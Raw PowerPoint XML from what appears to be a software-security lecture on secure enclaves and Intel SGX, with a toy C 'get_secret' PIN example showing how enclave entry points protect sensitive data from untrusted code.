              <a:t>PIN = 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret = 666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> int get_secret (int pin_guess) {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   if (tries_left &gt; 0) {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    if ( PIN == pin_guess) {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      tries_left = 3; return secret; } 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    else {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      tries_left--; return 0 ;}  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 } }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101382" name="Tekstvak 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B23CDD-0930-8B19-1E49-2C68EF42C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5124450"/>
            <a:ext cx="1968500" cy="1477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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t># include ″secret.h″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… // other modules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void main () {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…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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101383" name="Tekstvak 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B429E3-625C-D6A4-F657-15B46811D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1000125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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101384" name="Tekstvak 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A676F549-4CFB-BE91-6E0C-1C6FDC43F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4729163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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>main.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101385" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C31471-E990-3AB5-556E-75AD9684D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7" t="3464" r="32661" b="5792"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="1047750"/>
            <a:ext cx="23876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6" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F993717-9BEB-239B-5069-ECD557BED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925" y="4572000"/>
            <a:ext cx="115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en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enclave</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US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F9B0CF24-F555-0340-AE0C-C568AEE9DBBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5826125" y="4591050"/>
            <a:ext cx="598488" cy="647700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1776813"/>
              <a:gd name="T1" fmla="*/ 0 h 2883877"/>
              <a:gd name="T2" fmla="*/ 0 w 1776813"/>
              <a:gd name="T3" fmla="*/ 0 h 2883877"/>
              <a:gd name="T4" fmla="*/ 0 w 1776813"/>
              <a:gd name="T5" fmla="*/ 0 h 28838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6813" h="2883877">
                <a:moveTo>
                  <a:pt x="175846" y="2883877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="990600" y="2271346"/>
                  <a:pt x="1805354" y="1658815"/>
                  <a:pt x="1776046" y="1178169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1746738" y="697523"/>
                  <a:pt x="873369" y="348761"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="2222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A9B99C34-18B3-8684-C80B-93AB456F9679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5441950" y="4822825"/>
            <a:ext cx="982663" cy="1733550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1 w 1776813"/>
              <a:gd name="T1" fmla="*/ 1 h 2883877"/>
              <a:gd name="T2" fmla="*/ 1 w 1776813"/>
              <a:gd name="T3" fmla="*/ 1 h 2883877"/>
              <a:gd name="T4" fmla="*/ 0 w 1776813"/>
              <a:gd name="T5" fmla="*/ 0 h 28838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6813" h="2883877">
                <a:moveTo>
                  <a:pt x="175846" y="2883877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="990600" y="2271346"/>
                  <a:pt x="1805354" y="1658815"/>
                  <a:pt x="1776046" y="1178169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1746738" y="697523"/>
                  <a:pt x="873369" y="348761"/>
                  <a:pt x="0" y="0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1BB136E9-C079-994F-436C-5046938B5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5757863"/>
            <a:ext cx="3003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en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>untrusted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cannot access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sensitive data</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1400">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204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A81F2A66-2EF2-F90C-8330-747A9BE81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414963"/>
            <a:ext cx="3540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DCB74693-5B99-7BC9-A13A-6666B63B6424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6208713" y="4457700"/>
            <a:ext cx="1924050" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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dirty="0">
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101392" name="Rechthoek 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE8CCC1-BF5F-95E5-D059-DFDDA76E4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4972050"/>
            <a:ext cx="1922463" cy="536575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099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/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101393" name="Right Brace 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955CF81A-8AA4-13E1-0652-445A8825476E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8258175" y="4140200"/>
            <a:ext cx="158750" cy="1368425"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8341"/>
              <a:gd name="adj2" fmla="val 50000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D2E0A744-4C7D-069E-9A3E-6A5682CB7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2400"/>
              <a:t>Isolating security-sensitive code with secure enclaves </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CFE9979-079E-1332-24F0-8930D19D89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CB1F5010-1AF0-4321-B819-2121AE471208}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102404" name="Tekstvak 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D3480B-592E-FF74-0923-F28E1C94E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1385888"/>
            <a:ext cx="3130550" cy="31384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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tries_left = 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PIN = 1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;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 static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret = 666</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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int get_secret (int pin_guess) {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  if (tries_left &gt; 0) {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   if ( PIN == pin_guess) {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     tries_left = 3; return secret; } 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   else {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     tries_left--; return 0 ;}  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} }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102405" name="Tekstvak 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA01805A-3776-CF9F-F306-B1E1DED7C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5124450"/>
            <a:ext cx="1968500" cy="1477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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t># include ″secret.h″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… // other modules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void main () {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…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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102406" name="Tekstvak 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5876036-88C4-8637-5931-F21E7916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1000125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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>secret.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102407" name="Tekstvak 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0146301-C1B9-432D-02FE-512591E23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4729163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Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>main.c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102408" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{580F2DA2-9C08-B225-5CC9-E40BB9895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7" t="3464" r="32661" b="5792"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="1047750"/>
            <a:ext cx="23876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9" name="Right Brace 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4EC111A-D19D-F1F9-6687-95F7A459AB6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8258175" y="4140200"/>
            <a:ext cx="158750" cy="1368425"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8341"/>
              <a:gd name="adj2" fmla="val 50000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410" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0791AF2D-B63A-735F-DA57-2663CB616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925" y="4572000"/>
            <a:ext cx="115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en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enclave</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US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2411" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19162DB5-DA80-4F63-1B57-43EF994AD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57788"/>
            <a:ext cx="2936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en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Only allowed entry point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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get_secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1600" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0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47575685-B142-A4FD-4CCA-D7431E8CC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5837238"/>
            <a:ext cx="3690937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en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Untrusted code should not be able to jump to the middle of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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get_secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> code (recall return-to-libc &amp; ROP attacks)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34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63412D2-66CF-7A20-FF2D-7962BBCE8D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6208713" y="4457700"/>
            <a:ext cx="1924050" cy="514350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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dirty="0">
                <a:latin typeface="Comic Sans MS" pitchFamily="64" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102414" name="Rechthoek 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA75C9DA-AF65-D770-C588-FC3831DE4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4972050"/>
            <a:ext cx="1922463" cy="536575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00990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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C825C38F-E2B8-A492-046A-ACB0EE664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Secure enclaves</a:t>
            </a:r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876DD-86CE-7C7E-03B0-885C368A28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NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enclaves isolates part of the code together with its data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code outside the enclave cannot access the enclave's data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code outside the enclave can only jump to valid entry points for code inside the enclave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Less flexible than stack walking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US"/>
              <a:t>Code in the enclave cannot inspect the stack as the basis for security decisions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US"/>
              <a:t>Not such a rich collection of permissions, and programmer cannot define his own permissions	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US"/>
              <a:t>More secure, because</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS &amp; Java VM (Virtual Machine) are not in the TCB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800"/>
              <a:t>Also some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protection against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>physical attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800"/>
              <a:t>is possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1800"/>
              <a:t>But are physical attacks really in our attacker model? DRM is typically the reason to include user in the attacker model?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800"/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A178CE02-AF12-DFDA-FD8D-D3E7467C13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41593B2-E3DD-49AA-9FE9-3335033448B9}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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E20B2DBC-2664-A29D-FCD1-32758BB8E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 Enclaves using Intel SGX</a:t>
            </a:r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039E7-ED7C-CF35-E9EE-549F9EE97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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intel SGX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>provides</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hardware support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> enclaves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protecting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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900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of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enclave’s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rgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code &amp; data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>providing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trusted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Execution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Enviroment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (TEE)</a:t>
            </a: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nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This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not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only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protects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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> enclave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> rest of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
